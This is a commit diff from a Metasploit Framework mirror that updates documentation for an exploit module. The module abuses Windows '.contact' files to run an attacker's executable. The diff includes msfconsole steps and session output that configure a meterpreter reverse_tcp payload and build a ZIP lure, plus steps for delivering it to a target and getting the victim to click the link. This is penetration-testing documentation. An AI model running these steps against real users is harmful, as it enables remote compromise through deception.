infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update documentation to detail the verification steps and describe the module options

master
asoto-r7 2019-04-10 16:50:01 -05:00
parent 58be84b3b8
commit 7bccdf2d0f
No known key found for this signature in database
GPG Key ID: F531810B7FE55396
1 changed files with 52 additions and 16 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

68
documentation/modules/exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution.md
View File

@ -1,30 +1,66 @@
## Description
This module allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
The "." chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
12345678901234567890123456789012345678901234567890123456789012345678901234567890
This module allows remote attackers to execute arbitrary code on vulnerable
installations of Microsoft Windows. User interaction is required to exploit
this vulnerability in that the target must visit a malicious page or open a
malicious file. The flaw is due to the processing of ".contact" files <c:Url>
node param which takes an expected website value, however if an attacker
references an executable file it will run that instead without warning instead
of performing expected web navigation. This is dangerous and would be
unexpected to an end user.
Executable files can live in a sub-directory so when the ".contact" website link
is clicked it traverses directories towards the executable and runs. Making
matters worse is if the the files are compressed then downloaded "mark of the
web" (MOTW) may potentially not work as expected with certain archive utilitys.
The "." chars allow directory traversal to occur in order to run the attackers
supplied executable sitting unseen in the attackers directory. This advisory is
a duplicate issue that currently affects Windows .VCF files, and released for
the sake of completeness as it affects Windows .contact files as well.
## Vulnerable Application
Windows
Windows Contacts
(tested on Windows 10.0.18282)
## Verification Steps
1. `./msfconsole`
2. `use exploit/windows/fileformat/`
3. `set lport <lport>`
4. `set lhost <lhost>`
5. `exploit`
2. `use exploit/windows/fileformat/microsoft_windows_contact_remote_code_execution`
3. Configure the payload. For example: `set PAYLOAD windows/x64/meterpreter/bind_tcp`
4. Configure the payload parameters. For example: `set LHOST 192.168.1.1`
5. Set the output internal file: `set FILENAME msf.com`
6. Set the name of the contact: `set FULL_NAME John Smith`
7. Set the output of the ZIP to be delivered to the target: `set ZIP John Smith.zip`
8. `run`
## Scenarios
### microsoft_windows_contact_remote_code_execution Tested on Windows 10.0.18282
### Exploiting a Windows 10 host
1. Configure the module-specific settings.
```
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > exploit
[*] Creating 'John Smith.zip'
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FILENAME metasploit.com
FILENAME => metasploit.com
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set FULL_NAME David Davidson
FULL_NAME => David Davidson
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set ZIP David Davidson.zip
ZIP => David Davidson.zip
```
2. Configure the payload.
```
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > set LHOST 192.168.199.148
LHOST => 192.168.199.148
msf5 exploit(windows/fileformat/microsoft_windows_contact_remote_code_execution) > run
[*] Creating 'David Davidson.zip'
```
3. Send the ZIP to the target machine.
4. On the target machine, extract the ZIP file, open the .CONTACT file in the Windows Contacts viewer, and click the URL in the "Website" field.